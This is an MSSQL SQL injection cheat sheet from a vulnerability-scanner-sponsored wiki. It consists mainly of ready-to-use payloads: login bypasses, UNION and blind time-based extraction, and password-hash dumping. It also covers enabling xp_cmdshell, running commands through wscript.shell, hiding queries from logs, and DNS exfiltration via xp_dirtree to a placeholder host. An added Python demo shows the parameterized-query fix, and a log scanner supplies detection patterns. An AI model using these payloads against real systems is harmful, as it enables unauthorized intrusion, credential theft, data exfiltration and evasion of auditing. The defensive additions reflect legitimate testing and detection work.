The SQL Injection Wiki project aims to provide all bells and whistles about SQL Injection. It is a good reference for both seasoned web security professionals and those who are just starting. This project website is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the below list of databases:

The SQL Injection Wiki is sponsored by Netsparker, an automated false positive free web vulnerability scanner. Download a free trial.

MSSQL SQL Injection Cheat Sheet



Version:          SELECT @@VERSION
Current User:     SELECT user_name();
                  SELECT system_user;
                  SELECT user;
                  SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
Current Database: SELECT db_name()


Error Based SQLi
 For integer inputs : convert(int,@@version)
 For string inputs  : ' + convert(int,@@version) + '

 The payloads above should throw conversion errors, and the error message leaks the result of the embedded query.

Clear SQLi Tests: these tests are useful for boolean SQL injection and silent attacks, because each request should return the same page as the original if the parameter is injectable.

 product.asp?id=4
 product.asp?id=5-1
 product.asp?id=4 OR 1=1


Use this when you cannot see any difference in the output. Do not use more than 30 seconds, because the database API connection timeout could easily be reached.
This is just like sleep: it waits for the specified time. It is a CPU-safe way to make the database wait.

 WAITFOR DELAY '0:0:10'--

Real World Samples:
 ProductID=1;waitfor delay '0:0:10'--
 ProductID=1);waitfor delay '0:0:10'--
 ProductID=1';waitfor delay '0:0:10'--
 ProductID=1');waitfor delay '0:0:10'--
 ProductID=1));waitfor delay '0:0:10'--


 DROP sampletable;--
 DROP sampletable;#   (the # line comment is MySQL syntax and is not recognized by SQL Server; use -- there)
 Username: admin'--

 SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'

 This will log you in as the admin user, because the rest of the SQL query (the password check) is ignored.


Inline comments comment out the rest of the query if you do not close them. They can also be used for bypassing blacklists, removing spaces, obfuscating keywords and determining database versions.

  • DROP/*comment*/sampletable
  • DR/**/OP/*bypass blacklisting*/sampletable


Get a response based on an if statement. This is one of the key points of Blind SQL Injection, and it can also be very useful for testing simple things blindly and accurately.

SQL Server If Statement
  • IF condition true-part ELSE false-part (S)
  • IF (1=1) SELECT 'true' ELSE SELECT 'false'
If Statement SQL Injection Attack Samples

if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
This will throw a divide-by-zero error if the currently logged-in user is not "sa" or "dbo".


SELECT CHAR(75)+CHAR(76)+CHAR(77)

This will return ‘KLM’.


With UNION you can run SQL queries across tables. Basically you can poison the query to return records from another table.
  • SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
This will combine the results from both the news table and the members table and return all of them.

Another Example:
  • ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--


While exploiting UNION injections you sometimes get errors because of different language settings (table settings, field settings, combined table / database settings, etc.). These functions are quite useful for fixing this problem. It is rare, but if you are dealing with Japanese, Russian, Turkish, etc. applications then you will see it.

Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid collation name; check the SQL Server documentation.

SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members


Bypassing Login Screens (SQL Injection 101, Login tricks)
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
Bypassing second MD5 hash check login screens

If the application first gets the record by username and then compares the returned MD5 with the supplied password's MD5, then you need some extra tricks to fool the application into bypassing authentication. You can UNION the results with a known password and the MD5 hash of the supplied password. In this case the application will compare your password with your supplied MD5 hash instead of the MD5 from the database.

Username : admin
Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
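The admin'-- and ' or 1=1-- login tricks above, reproduced beside the fix, as an added example that is not part of the cheat sheet. It assumes an in-memory SQLite database as a stand-in for SQL Server so it runs offline (the -- comment and OR 1=1 behave the same way in both), and the members table and its rows are constructed sample data.

```python
import sqlite3  # stand-in for SQL Server so the example runs offline (assumption)

def make_db():
    """Constructed members table; the rows are sample data, not from the page."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (username TEXT, password TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?)",
                    [("admin", "s3cret"), ("bob", "hunter2")])
    return con

def login_vulnerable(con, username, password):
    """String concatenation: the input is parsed as SQL, so admin'-- comments
    out the password check and ' or 1=1-- matches every row."""
    sql = ("SELECT username FROM members WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in con.execute(sql)]

def login_safe(con, username, password):
    """Parameterized query: the same input is bound as a literal value and
    can only ever be compared against the stored username column."""
    sql = "SELECT username FROM members WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (username, password))]

if __name__ == "__main__":
    con = make_db()
    for user in ("admin'--", "' or 1=1--"):
        print(repr(user), "vulnerable:", login_vulnerable(con, user, "wrong"),
              "safe:", login_safe(con, user, "wrong"))
```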


SQL Server doesn't log queries which include sp_password, for security reasons(!). So if you add --sp_password to your queries they will not appear in the SQL Server logs (of course they will still be in the web server logs; try to use POST if possible).


Insert a file's content into a table. If you don't know the internal path of the web application you can read the IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify the application path.

CREATE TABLE foo( line varchar(8000) );
BULK INSERT foo FROM 'c:\inetpub\wwwroot\login.asp';
DROP TABLE foo;  -- then repeat for another file



Write a text file. Login credentials are required to use this function.

bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar


You can use VBS and WSH scripting in SQL Server because of ActiveX support (the sp_OA* OLE automation procedures).

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'

Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --


By default xp_cmdshell and a couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable them.

EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE


By default it's disabled in SQL Server 2005. You need to have admin access.

EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

Simple ping check (configure your firewall or sniffer to identify the request before launching it):

EXEC master.dbo.xp_cmdshell 'ping '


EXEC sp_addlogin 'user', 'pass';


EXEC sp_droplogin 'user';


EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';


1. Registry Stuff (xp_regread)
  • xp_regaddmultistring
  • xp_regdeletekey
  • xp_regdeletevalue
  • xp_regenumkeys
  • xp_regenumvalues
  • xp_regread
  • xp_regremovemultistring
  • xp_regwrite
  • exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
  • exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
2. Managing Services (xp_servicecontrol)
3. Medias (xp_availablemedia)
4. ODBC Resources (xp_enumdsn)
5. Login mode (xp_loginconfig)
6. Creating Cab Files (xp_makecab)
7. Domain Enumeration (xp_ntsec_enumdomains)
8. Process Killing (need PID) (xp_terminate_process)
9. Add new procedure (virtually you can execute whatever you want)
10. sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll'
11. exec xp_webserver
12. Write text file to a UNC or an internal path (sp_makewebtask)


SELECT name FROM master..syslogins


MSSQL 2000:
  • SELECT name, password FROM master..sysxlogins
MSSQL 2005:
  • SELECT name, password_hash FROM master.sys.sql_logins


SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...


IS_MEMBER()
The function indicates whether the current user is a member of the specified Microsoft Windows group or SQL Server database role.

IF IS_MEMBER ('db_owner') = 1
PRINT 'Current user is a member of the db_owner role'

IS_SRVROLEMEMBER()
Indicates whether a SQL Server login is a member of the specified fixed server role.

IF IS_SRVROLEMEMBER ('sysadmin') = 1
print 'Current user''s login is a member of the sysadmin role'


SELECT name FROM sysobjects WHERE xtype = 'U'


This only reads the columns of tables in the current database.

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

This works globally. Replace master with the name of the database which holds the table whose columns you want to read, and replace 'sometable' with the table name.

SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';


SELECT * FROM master..sysmessages


SELECT * FROM master..sysservers


  • northwind
  • model
  • msdb
  • pubs
  • tempdb


%PROGRAM_FILES%\Microsoft SQL Server\MSSQL.1\MSSQL\Data\


?vulnerableParam=1;DECLARE @x as int;DECLARE @w as char(6);SET @x=ASCII(SUBSTRING(({INJECTION}),1,1));IF @x=100 SET @w='0:0:14' ELSE SET @w='0:0:01';WAITFOR DELAY @w--

{INJECTION} = the query you want to run.

If the condition is true, the response arrives after 14 seconds. If it is false, it is delayed for only one second.
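The WAITFOR DELAY samples, the inline-comment obfuscation (DR/**/OP) and the conditional-delay payload above all leave recognisable traces in web server logs. This added detector, which is not part of the cheat sheet, URL-decodes each request and strips /* */ comments before matching the page's idioms, so encoded and comment-split payloads are still caught. It assumes a simplified "ip method url" log format; the log lines are constructed, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Patterns drawn from the payloads on this page (matched after normalization).
SIGNATURES = {
    "time_based":   re.compile(r"waitfor\s+delay"),
    "error_based":  re.compile(r"convert\s*\(\s*int\s*,\s*@@version"),
    "union_based":  re.compile(r"union\s+(all\s+)?select"),
    "comment_term": re.compile(r"'\s*(--|#)"),
    "xp_cmdshell":  re.compile(r"xp_cmdshell"),
    "activex":      re.compile(r"sp_oa(create|method)"),
    "out_of_band":  re.compile(r"xp_dirtree|openrowset"),
}

def normalize(raw):
    """URL-decode twice (double encoding), drop /*...*/ comments, lowercase."""
    text = unquote_plus(unquote_plus(raw))
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)   # DR/**/OP -> DROP
    return re.sub(r"\s+", " ", text).lower()

def classify(query_string):
    """Return the sorted signature names that match one decoded query string."""
    norm = normalize(query_string)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(norm))

def scan_log(lines):
    """Yield (client_ip, url, hits) for each 'ip method url' line that matches."""
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        hits = classify(fields[2])
        if hits:
            yield fields[0], fields[2], hits

# Constructed log lines (assumed format: ip method url); not real traffic.
SAMPLE_LOG = [
    "10.0.0.5 GET /product.asp?id=4",
    "10.0.0.9 GET /product.asp?ProductID=1;waitfor%20delay%20'0:0:10'--",
    "10.0.0.9 GET /product.asp?id=4%20OR%20convert(int,@@version)",
    "10.0.0.9 GET /login.asp?user=admin'/**/UNI/**/ON%20SELECT%201--",
    "10.0.0.7 GET /item.asp?id=1;EXEC%20master..xp_dirtree%20'\\\\x.example\\t'",
]

if __name__ == "__main__":
    for ip, url, hits in scan_log(SAMPLE_LOG):
        print(ip, hits, url)
```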


?vulnerableParam=1; SELECT * FROM OPENROWSET('SQLOLEDB', ({INJECT})+'.yourhost.com';'sa';'pwd', 'SELECT 1')

Makes a DNS resolution request to {INJECT}.yourhost.com

?vulnerableParam=1; DECLARE @q varchar(1024); SET @q = '\\'+({INJECT})+'.yourhost.com\\test.txt'; EXEC master..xp_dirtree @q

Makes a DNS resolution request to {INJECT}.yourhost.com

{INJECT} = the query whose result you want to exfiltrate in the hostname.